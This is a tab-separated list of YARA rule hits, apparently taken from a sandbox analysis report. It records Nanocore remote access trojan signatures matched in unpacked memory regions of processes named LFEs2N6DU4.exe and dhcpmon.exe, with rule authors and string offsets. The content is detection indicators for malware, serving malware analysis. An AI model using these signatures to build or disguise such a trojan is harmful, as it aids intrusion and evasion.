22.2.dhcpmon.exe.3c59b90.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.dhcpmon.exe.3c59b90.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.2.LFEs2N6DU4.exe.3559b90.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.3559b90.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.3559b90.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.3559b90.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287c1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287ee:$x2: IClientNetworkHost
24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287c1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2989c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287db:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4171b50.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.4171b50.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x32b25:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.4171b50.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4171b50.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x32b15:$a: NanoCore 0x32b25:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x32b74:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q
24.2.LFEs2N6DU4.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
24.2.LFEs2N6DU4.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
24.2.LFEs2N6DU4.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
22.2.dhcpmon.exe.2bb0b34.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.2bb0b34.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x101b7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.2bb0b34.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
26.2.dhcpmon.exe.33705c4.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287c1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287ee:$x2: IClientNetworkHost
26.2.dhcpmon.exe.33705c4.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287c1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2989c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287db:$s5: IClientLoggingHost
26.2.dhcpmon.exe.33705c4.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4199b70.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.4199b70.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.4199b70.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4199b70.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
21.2.dhcpmon.exe.2800d80.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.2800d80.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.2800d80.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
21.2.dhcpmon.exe.2800d80.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.2800d80.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x101b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.2800d80.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
25.2.dhcpmon.exe.3c04bed.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24198:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241c5:$x2: IClientNetworkHost
25.2.dhcpmon.exe.3c04bed.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24198:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25273:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241b2:$s5: IClientLoggingHost
25.2.dhcpmon.exe.3c04bed.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.34e1b50.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.34e1b50.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x32b25:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.34e1b50.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.34e1b50.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x32b15:$a: NanoCore 0x32b25:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x32b74:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q
26.2.dhcpmon.exe.2389698.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
26.2.dhcpmon.exe.2389698.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
21.2.dhcpmon.exe.3859b70.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.3859b70.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.3859b70.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.3859b70.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
26.2.dhcpmon.exe.33705c4.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
26.2.dhcpmon.exe.33705c4.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
26.2.dhcpmon.exe.33705c4.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.LFEs2N6DU4.exe.3df05c4.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.3df05c4.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.3df05c4.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x37f25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x381ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x397e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x397da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x3a68b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x40442:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x381d7:$s5: IClientLoggingHost
1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x3809b:$c: ProjectData 0x10a82:$d: DESCrypto 0x38aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
21.2.dhcpmon.exe.3859b70.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.3859b70.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.3859b70.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.3859b70.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
26.2.dhcpmon.exe.336b78e.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5f7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d624:$x2: IClientNetworkHost
26.2.dhcpmon.exe.336b78e.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5f7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6d2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d611:$s5: IClientLoggingHost
26.2.dhcpmon.exe.336b78e.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.dhcpmon.exe.336b78e.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d5ad:$a: NanoCore 0x2d5c2:$a: NanoCore 0x2d5f7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d369:$b: ClientPlugin 0x2d384:$b: ClientPlugin
26.2.dhcpmon.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
26.2.dhcpmon.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
26.2.dhcpmon.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
26.2.dhcpmon.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.LFEs2N6DU4.exe.55d0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.55d0000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41c05c4.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
24.2.LFEs2N6DU4.exe.41c05c4.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41c05c4.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
